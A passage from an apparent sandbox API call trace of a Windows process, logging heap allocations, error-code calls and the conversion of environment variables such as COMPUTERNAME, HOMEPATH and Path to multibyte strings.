lpMultiByteStr=0x6357a8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0120.411] GetLastError () returned 0x0 [0120.411] SetLastError (dwErrCode=0x0) [0120.411] GetLastError () returned 0x0 [0120.411] SetLastError (dwErrCode=0x0) [0120.411] GetLastError () returned 0x0 [0120.411] SetLastError (dwErrCode=0x0) [0120.411] GetLastError () returned 0x0 [0120.411] SetLastError (dwErrCode=0x0) [0120.411] GetLastError () returned 0x0 [0120.411] SetLastError (dwErrCode=0x0) [0120.411] GetLastError () returned 0x0 [0120.411] SetLastError (dwErrCode=0x0) [0120.411] GetLastError () returned 0x0 [0120.411] SetLastError (dwErrCode=0x0) [0120.411] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641218) returned 0x10 [0120.411] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641218, Size=0x14) returned 0x641270 [0120.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0120.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x31) returned 0x641290 [0120.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x641290, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0120.411] GetLastError () returned 0x0 [0120.411] SetLastError (dwErrCode=0x0) [0120.411] GetLastError () returned 0x0 [0120.411] SetLastError (dwErrCode=0x0) [0120.412] GetLastError () returned 0x0 [0120.412] SetLastError (dwErrCode=0x0) [0120.412] GetLastError () returned 0x0 [0120.412] SetLastError (dwErrCode=0x0) [0120.412] GetLastError () returned 0x0 [0120.412] SetLastError (dwErrCode=0x0) [0120.412] GetLastError () returned 0x0 [0120.412] SetLastError (dwErrCode=0x0) [0120.412] GetLastError () returned 0x0 [0120.412] SetLastError (dwErrCode=0x0) [0120.412] GetLastError () returned 0x0 [0120.412] SetLastError (dwErrCode=0x0) [0120.412] GetLastError () returned 0x0 [0120.412] SetLastError (dwErrCode=0x0) [0120.412] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641270) returned 0x14 [0120.412] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641270, Size=0x18) returned 0x641270 [0120.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0120.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x17) returned 0x6412d0 [0120.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x6412d0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0120.412] GetLastError () returned 0x0 [0120.412] SetLastError (dwErrCode=0x0) [0120.412] GetLastError () returned 0x0 [0120.413] SetLastError (dwErrCode=0x0) [0120.413] GetLastError () returned 0x0 [0120.413] SetLastError (dwErrCode=0x0) [0120.413] GetLastError () returned 0x0 [0120.413] SetLastError (dwErrCode=0x0) [0120.413] GetLastError () returned 0x0 [0120.413] SetLastError (dwErrCode=0x0) [0120.413] GetLastError () returned 0x0 [0120.413] SetLastError (dwErrCode=0x0) [0120.413] GetLastError () returned 0x0 [0120.413] SetLastError (dwErrCode=0x0) [0120.413] GetLastError () returned 0x0 [0120.413] SetLastError (dwErrCode=0x0) [0120.413] GetLastError () returned 0x0 [0120.413] SetLastError (dwErrCode=0x0) [0120.413] GetLastError () returned 0x0 [0120.413] SetLastError (dwErrCode=0x0) [0120.413] GetLastError () returned 0x0 [0120.413] SetLastError (dwErrCode=0x0) [0120.413] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641270) returned 0x18 [0120.413] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641270, Size=0x1c) returned 0x6412f0 [0120.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0120.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x24) returned 0x63aa50 [0120.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x63aa50, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0120.414] GetLastError () returned 0x0 [0120.414] SetLastError (dwErrCode=0x0) [0120.414] GetLastError () returned 0x0 [0120.414] SetLastError (dwErrCode=0x0) [0120.414] GetLastError () returned 0x0 [0120.414] SetLastError (dwErrCode=0x0) [0120.414] GetLastError () returned 0x0 [0120.414] SetLastError (dwErrCode=0x0) [0120.414] GetLastError () returned 0x0 [0120.414] SetLastError (dwErrCode=0x0) [0120.414] GetLastError () returned 0x0 [0120.414] SetLastError (dwErrCode=0x0) [0120.414] GetLastError () returned 0x0 [0120.414] SetLastError (dwErrCode=0x0) [0120.414] GetLastError () returned 0x0 [0120.414] SetLastError (dwErrCode=0x0) [0120.414] GetLastError () returned 0x0 [0120.415] SetLastError (dwErrCode=0x0) [0120.415] GetLastError () returned 0x0 [0120.415] SetLastError (dwErrCode=0x0) [0120.415] GetLastError () returned 0x0 [0120.415] SetLastError (dwErrCode=0x0) [0120.415] GetLastError () returned 0x0 [0120.415] SetLastError (dwErrCode=0x0) [0120.415] GetLastError () returned 0x0 [0120.415] SetLastError (dwErrCode=0x0) [0120.415] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6412f0) returned 0x1c [0120.415] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6412f0, Size=0x20) returned 0x6412f0 [0120.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0120.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x14) returned 0x641270 [0120.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x641270, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0120.415] GetLastError () returned 0x0 [0120.415] SetLastError (dwErrCode=0x0) [0120.415] GetLastError () returned 0x0 [0120.415] SetLastError (dwErrCode=0x0) [0120.415] GetLastError () returned 0x0 [0120.415] SetLastError (dwErrCode=0x0) [0120.415] GetLastError () returned 0x0 [0120.415] SetLastError (dwErrCode=0x0) [0120.415] GetLastError () returned 0x0 [0120.416] SetLastError (dwErrCode=0x0) [0120.416] GetLastError () returned 0x0 [0120.416] SetLastError (dwErrCode=0x0) [0120.416] GetLastError () returned 0x0 [0120.416] SetLastError (dwErrCode=0x0) [0120.416] GetLastError () returned 0x0 [0120.416] SetLastError (dwErrCode=0x0) [0120.416] GetLastError () returned 0x0 [0120.416] SetLastError (dwErrCode=0x0) [0120.416] GetLastError () returned 0x0 [0120.416] SetLastError (dwErrCode=0x0) [0120.416] GetLastError () returned 0x0 [0120.416] SetLastError (dwErrCode=0x0) [0120.416] GetLastError () returned 0x0 [0120.416] SetLastError (dwErrCode=0x0) [0120.416] GetLastError () returned 0x0 [0120.416] SetLastError (dwErrCode=0x0) [0120.416] GetLastError () returned 0x0 [0120.416] SetLastError (dwErrCode=0x0) [0120.416] GetLastError () returned 0x0 [0120.416] SetLastError (dwErrCode=0x0) [0120.416] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6412f0) returned 0x20 [0120.417] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6412f0, Size=0x24) returned 0x6412f0 [0120.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0120.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xd) returned 0x63e6f0 [0120.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x63e6f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0120.417] GetLastError () returned 0x0 [0120.417] SetLastError (dwErrCode=0x0) [0120.417] GetLastError () returned 0x0 [0120.417] SetLastError (dwErrCode=0x0) [0120.417] GetLastError () returned 0x0 [0120.417] SetLastError (dwErrCode=0x0) [0120.417] GetLastError () returned 0x0 [0120.417] SetLastError (dwErrCode=0x0) [0120.417] GetLastError () returned 0x0 [0120.417] SetLastError (dwErrCode=0x0) [0120.417] GetLastError () returned 0x0 [0120.417] SetLastError (dwErrCode=0x0) [0120.417] GetLastError () returned 0x0 [0120.417] SetLastError (dwErrCode=0x0) [0120.417] GetLastError () returned 0x0 [0120.417] SetLastError (dwErrCode=0x0) [0120.417] GetLastError () returned 0x0 [0120.417] SetLastError (dwErrCode=0x0) [0120.417] GetLastError () returned 0x0 [0120.418] SetLastError (dwErrCode=0x0) [0120.418] GetLastError () returned 0x0 [0120.418] SetLastError (dwErrCode=0x0) [0120.418] GetLastError () returned 0x0 [0120.418] SetLastError (dwErrCode=0x0) [0120.418] GetLastError () returned 0x0 [0120.418] SetLastError (dwErrCode=0x0) [0120.418] GetLastError () returned 0x0 [0120.418] SetLastError (dwErrCode=0x0) [0120.418] GetLastError () returned 0x0 [0120.418] SetLastError (dwErrCode=0x0) [0120.418] GetLastError () returned 0x0 [0120.418] SetLastError (dwErrCode=0x0) [0120.418] GetLastError () returned 0x0 [0120.418] SetLastError (dwErrCode=0x0) [0120.418] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6412f0) returned 0x24 [0120.418] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6412f0, Size=0x28) returned 0x6412f0 [0120.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0120.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x25) returned 0x63aa80 [0120.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x63aa80, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0120.418] GetLastError () returned 0x0 [0120.418] SetLastError (dwErrCode=0x0) [0120.418] GetLastError () returned 0x0 [0120.419] SetLastError (dwErrCode=0x0) [0120.419] GetLastError () returned 0x0 [0120.419] SetLastError (dwErrCode=0x0) [0120.419] GetLastError () returned 0x0 [0120.419] SetLastError (dwErrCode=0x0) [0120.419] GetLastError () returned 0x0 [0120.419] SetLastError (dwErrCode=0x0) [0120.419] GetLastError () returned 0x0 [0120.419] SetLastError (dwErrCode=0x0) [0120.419] GetLastError () returned 0x0 [0120.419] SetLastError (dwErrCode=0x0) [0120.419] GetLastError () returned 0x0 [0120.419] SetLastError (dwErrCode=0x0) [0120.419] GetLastError () returned 0x0 [0120.419] SetLastError (dwErrCode=0x0) [0120.419] GetLastError () returned 0x0 [0120.419] SetLastError (dwErrCode=0x0) [0120.419] GetLastError () returned 0x0 [0120.419] SetLastError (dwErrCode=0x0) [0120.419] GetLastError () returned 0x0 [0120.419] SetLastError (dwErrCode=0x0) [0120.419] GetLastError () returned 0x0 [0120.419] SetLastError (dwErrCode=0x0) [0120.420] GetLastError () returned 0x0 [0120.420] SetLastError (dwErrCode=0x0) [0120.420] GetLastError () returned 0x0 [0120.420] SetLastError (dwErrCode=0x0) [0120.420] GetLastError () returned 0x0 [0120.420] SetLastError (dwErrCode=0x0) [0120.420] GetLastError () returned 0x0 [0120.420] SetLastError (dwErrCode=0x0) [0120.420] GetLastError () returned 0x0 [0120.420] SetLastError (dwErrCode=0x0) [0120.420] GetLastError () returned 0x0 [0120.420] SetLastError (dwErrCode=0x0) [0120.420] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6412f0) returned 0x28 [0120.420] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6412f0, Size=0x2c) returned 0x6412f0 [0120.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0120.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x39) returned 0x6357f0 [0120.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x6357f0, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0120.421] GetLastError () returned 0x0 [0120.421] SetLastError (dwErrCode=0x0) [0120.421] GetLastError () returned 0x0 [0120.421] SetLastError (dwErrCode=0x0) [0120.421] GetLastError () returned 0x0 [0120.421] SetLastError (dwErrCode=0x0) [0120.421] GetLastError () returned 0x0 [0120.421] SetLastError (dwErrCode=0x0) [0120.421] GetLastError () returned 0x0 [0120.421] SetLastError (dwErrCode=0x0) [0120.421] GetLastError () returned 0x0 [0120.421] SetLastError (dwErrCode=0x0) [0120.421] GetLastError () returned 0x0 [0120.421] SetLastError (dwErrCode=0x0) [0120.421] GetLastError () returned 0x0 [0120.421] SetLastError (dwErrCode=0x0) [0120.421] GetLastError () returned 0x0 [0120.421] SetLastError (dwErrCode=0x0) [0120.422] GetLastError () returned 0x0 [0120.422] SetLastError (dwErrCode=0x0) [0120.422] GetLastError () returned 0x0 [0120.422] SetLastError (dwErrCode=0x0) [0120.422] GetLastError () returned 0x0 [0120.422] SetLastError (dwErrCode=0x0) [0120.422] GetLastError () returned 0x0 [0120.422] SetLastError (dwErrCode=0x0) [0120.422] GetLastError () returned 0x0 [0120.422] SetLastError (dwErrCode=0x0) [0120.422] GetLastError () returned 0x0 [0120.422] SetLastError (dwErrCode=0x0) [0120.422] GetLastError () returned 0x0 [0120.422] SetLastError (dwErrCode=0x0) [0120.422] GetLastError () returned 0x0 [0120.422] SetLastError (dwErrCode=0x0) [0120.422] GetLastError () returned 0x0 [0120.423] SetLastError (dwErrCode=0x0) [0120.423] GetLastError () returned 0x0 [0120.423] SetLastError (dwErrCode=0x0) [0120.423] GetLastError () returned 0x0 [0120.423] SetLastError (dwErrCode=0x0) [0120.423] GetLastError () returned 0x0 [0120.423] SetLastError (dwErrCode=0x0) [0120.423] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6412f0) returned 0x2c [0120.423] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6412f0, Size=0x30) returned 0x6412f0 [0120.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0120.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x18) returned 0x641328 [0120.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x641328, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0120.423] GetLastError () returned 0x0 [0120.423] SetLastError (dwErrCode=0x0) [0120.423] GetLastError () returned 0x0 [0120.423] SetLastError (dwErrCode=0x0) [0120.423] GetLastError () returned 0x0 [0120.424] SetLastError (dwErrCode=0x0) [0120.424] GetLastError () returned 0x0 [0120.424] SetLastError (dwErrCode=0x0) [0120.424] GetLastError () returned 0x0 [0120.424] SetLastError (dwErrCode=0x0) [0120.424] GetLastError () returned 0x0 [0120.424] SetLastError (dwErrCode=0x0) [0120.424] GetLastError () returned 0x0 [0120.424] SetLastError (dwErrCode=0x0) [0120.424] GetLastError () returned 0x0 [0120.424] SetLastError (dwErrCode=0x0) [0120.424] GetLastError () returned 0x0 [0120.424] SetLastError (dwErrCode=0x0) [0120.424] GetLastError () returned 0x0 [0120.424] SetLastError (dwErrCode=0x0) [0120.424] GetLastError () returned 0x0 [0120.424] SetLastError (dwErrCode=0x0) [0120.424] GetLastError () returned 0x0 [0120.425] SetLastError (dwErrCode=0x0) [0120.425] GetLastError () returned 0x0 [0120.425] SetLastError (dwErrCode=0x0) [0120.425] GetLastError () returned 0x0 [0120.425] SetLastError (dwErrCode=0x0) [0120.425] GetLastError () returned 0x0 [0120.425] SetLastError (dwErrCode=0x0) [0120.425] GetLastError () returned 0x0 [0120.425] SetLastError (dwErrCode=0x0) [0120.425] GetLastError () returned 0x0 [0120.425] SetLastError (dwErrCode=0x0) [0120.425] GetLastError () returned 0x0 [0120.425] SetLastError (dwErrCode=0x0) [0120.425] GetLastError () returned 0x0 [0120.425] SetLastError (dwErrCode=0x0) [0120.425] GetLastError () returned 0x0 [0120.425] SetLastError (dwErrCode=0x0) [0120.425] GetLastError () returned 0x0 [0120.425] SetLastError (dwErrCode=0x0) [0120.425] GetLastError () returned 0x0 [0120.426] SetLastError (dwErrCode=0x0) [0120.426] GetLastError () returned 0x0 [0120.426] SetLastError (dwErrCode=0x0) [0120.426] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6412f0) returned 0x30 [0120.426] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6412f0, Size=0x34) returned 0x641348 [0120.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0120.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x17) returned 0x6412f0 [0120.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x6412f0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0120.426] GetLastError () returned 0x0 [0120.426] SetLastError (dwErrCode=0x0) [0120.426] GetLastError () returned 0x0 [0120.426] SetLastError (dwErrCode=0x0) [0120.426] GetLastError () returned 0x0 [0120.426] SetLastError (dwErrCode=0x0) [0120.426] GetLastError () returned 0x0 [0120.426] SetLastError (dwErrCode=0x0) [0120.426] GetLastError () returned 0x0 [0120.426] SetLastError (dwErrCode=0x0) [0120.426] GetLastError () returned 0x0 [0120.426] SetLastError (dwErrCode=0x0) [0120.426] GetLastError () returned 0x0 [0120.427] SetLastError (dwErrCode=0x0) [0120.427] GetLastError () returned 0x0 [0120.427] SetLastError (dwErrCode=0x0) [0120.427] GetLastError () returned 0x0 [0120.427] SetLastError (dwErrCode=0x0) [0120.427] GetLastError () returned 0x0 [0120.427] SetLastError (dwErrCode=0x0) [0120.427] GetLastError () returned 0x0 [0120.427] SetLastError (dwErrCode=0x0) [0120.427] GetLastError () returned 0x0 [0120.427] SetLastError (dwErrCode=0x0) [0120.427] GetLastError () returned 0x0 [0120.427] SetLastError (dwErrCode=0x0) [0120.427] GetLastError () returned 0x0 [0120.427] SetLastError (dwErrCode=0x0) [0120.427] GetLastError () returned 0x0 [0120.427] SetLastError (dwErrCode=0x0) [0120.427] GetLastError () returned 0x0 [0120.427] SetLastError (dwErrCode=0x0) [0120.427] GetLastError () returned 0x0 [0120.428] SetLastError (dwErrCode=0x0) [0120.428] GetLastError () returned 0x0 [0120.428] SetLastError (dwErrCode=0x0) [0120.428] GetLastError () returned 0x0 [0120.428] SetLastError (dwErrCode=0x0) [0120.428] GetLastError () returned 0x0 [0120.428] SetLastError (dwErrCode=0x0) [0120.428] GetLastError () returned 0x0 [0120.428] SetLastError (dwErrCode=0x0) [0120.428] GetLastError () returned 0x0 [0120.428] SetLastError (dwErrCode=0x0) [0120.428] GetLastError () returned 0x0 [0120.428] SetLastError (dwErrCode=0x0) [0120.428] GetLastError () returned 0x0 [0120.428] SetLastError (dwErrCode=0x0) [0120.428] GetLastError () returned 0x0 [0120.428] SetLastError (dwErrCode=0x0) [0120.428] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641348) returned 0x34 [0120.429] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641348, Size=0x38) returned 0x641348 [0120.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0120.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xe) returned 0x63e708 [0120.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x63e708, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0120.429] GetLastError () returned 0x0 [0120.429] SetLastError (dwErrCode=0x0) [0120.429] GetLastError () returned 0x0 [0120.429] SetLastError (dwErrCode=0x0) [0120.429] GetLastError () returned 0x0 [0120.429] SetLastError (dwErrCode=0x0) [0120.429] GetLastError () returned 0x0 [0120.429] SetLastError (dwErrCode=0x0) [0120.429] GetLastError () returned 0x0 [0120.429] SetLastError (dwErrCode=0x0) [0120.429] GetLastError () returned 0x0 [0120.429] SetLastError (dwErrCode=0x0) [0120.429] GetLastError () returned 0x0 [0120.429] SetLastError (dwErrCode=0x0) [0120.429] GetLastError () returned 0x0 [0120.429] SetLastError (dwErrCode=0x0) [0120.430] GetLastError () returned 0x0 [0120.430] SetLastError (dwErrCode=0x0) [0120.430] GetLastError () returned 0x0 [0120.430] SetLastError (dwErrCode=0x0) [0120.430] GetLastError () returned 0x0 [0120.430] SetLastError (dwErrCode=0x0) [0120.430] GetLastError () returned 0x0 [0120.430] SetLastError (dwErrCode=0x0) [0120.430] GetLastError () returned 0x0 [0120.430] SetLastError (dwErrCode=0x0) [0120.430] GetLastError () returned 0x0 [0120.430] SetLastError (dwErrCode=0x0) [0120.430] GetLastError () returned 0x0 [0120.430] SetLastError (dwErrCode=0x0) [0120.430] GetLastError () returned 0x0 [0120.430] SetLastError (dwErrCode=0x0) [0120.430] GetLastError () returned 0x0 [0120.431] SetLastError (dwErrCode=0x0) [0120.431] GetLastError () returned 0x0 [0120.431] SetLastError (dwErrCode=0x0) [0120.431] GetLastError () returned 0x0 [0120.431] SetLastError (dwErrCode=0x0) [0120.431] GetLastError () returned 0x0 [0120.431] SetLastError (dwErrCode=0x0) [0120.431] GetLastError () returned 0x0 [0120.431] SetLastError (dwErrCode=0x0) [0120.431] GetLastError () returned 0x0 [0120.431] SetLastError (dwErrCode=0x0) [0120.431] GetLastError () returned 0x0 [0120.431] SetLastError (dwErrCode=0x0) [0120.431] GetLastError () returned 0x0 [0120.431] SetLastError (dwErrCode=0x0) [0120.431] GetLastError () returned 0x0 [0120.431] SetLastError (dwErrCode=0x0) [0120.432] GetLastError () returned 0x0 [0120.432] SetLastError (dwErrCode=0x0) [0120.432] GetLastError () returned 0x0 [0120.432] SetLastError (dwErrCode=0x0) [0120.432] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641348) returned 0x38 [0120.432] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641348, Size=0x3c) returned 0x641348 [0120.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0120.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x69) returned 0x641390 [0120.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x641390, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0120.432] GetLastError () returned 0x0 [0120.432] SetLastError (dwErrCode=0x0) [0120.432] GetLastError () returned 0x0 [0120.432] SetLastError (dwErrCode=0x0) [0120.432] GetLastError () returned 0x0 [0120.432] SetLastError (dwErrCode=0x0) [0120.432] GetLastError () returned 0x0 [0120.432] SetLastError (dwErrCode=0x0) [0120.432] GetLastError () returned 0x0 [0120.432] SetLastError (dwErrCode=0x0) [0120.432] GetLastError () returned 0x0 [0120.433] SetLastError (dwErrCode=0x0) [0120.433] GetLastError () returned 0x0 [0120.433] SetLastError (dwErrCode=0x0) [0120.433] GetLastError () returned 0x0 [0120.433] SetLastError (dwErrCode=0x0) [0120.433] GetLastError () returned 0x0 [0120.433] SetLastError (dwErrCode=0x0) [0120.433] GetLastError () returned 0x0 [0120.433] SetLastError (dwErrCode=0x0) [0120.433] GetLastError () returned 0x0 [0120.433] SetLastError (dwErrCode=0x0) [0120.433] GetLastError () returned 0x0 [0120.433] SetLastError (dwErrCode=0x0) [0120.433] GetLastError () returned 0x0 [0120.433] SetLastError (dwErrCode=0x0) [0120.433] GetLastError () returned 0x0 [0120.433] SetLastError (dwErrCode=0x0) [0120.433] GetLastError () returned 0x0 [0120.433] SetLastError (dwErrCode=0x0) [0120.433] GetLastError () returned 0x0 [0120.433] SetLastError (dwErrCode=0x0) [0120.433] GetLastError () returned 0x0 [0120.434] SetLastError (dwErrCode=0x0) [0120.434] GetLastError () returned 0x0 [0120.434] SetLastError (dwErrCode=0x0) [0120.434] GetLastError () returned 0x0 [0120.434] SetLastError (dwErrCode=0x0) [0120.434] GetLastError () returned 0x0 [0120.434] SetLastError (dwErrCode=0x0) [0120.434] GetLastError () returned 0x0 [0120.434] SetLastError (dwErrCode=0x0) [0120.434] GetLastError () returned 0x0 [0120.434] SetLastError (dwErrCode=0x0) [0120.434] GetLastError () returned 0x0 [0120.434] SetLastError (dwErrCode=0x0) [0120.434] 